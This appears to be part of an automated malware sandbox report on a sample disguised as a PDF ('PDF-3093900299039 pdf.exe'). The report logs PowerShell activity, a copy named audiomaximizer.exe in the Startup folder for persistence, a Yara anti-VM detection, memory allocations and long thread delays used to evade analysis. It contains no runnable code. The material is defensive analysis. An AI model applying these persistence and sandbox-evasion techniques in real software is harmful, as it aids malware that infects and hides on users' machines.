Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7404, type: MEMORYSTR

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 2820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 4820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 1CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 3660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Memory allocated: 1E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 1720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 50C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 1680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 30B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Memory allocated: 50B0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599310	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599200	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598388	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598170	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596825	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596424	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594327	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598544
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597763
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597655
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597325
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596671
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596452
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595794
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595359
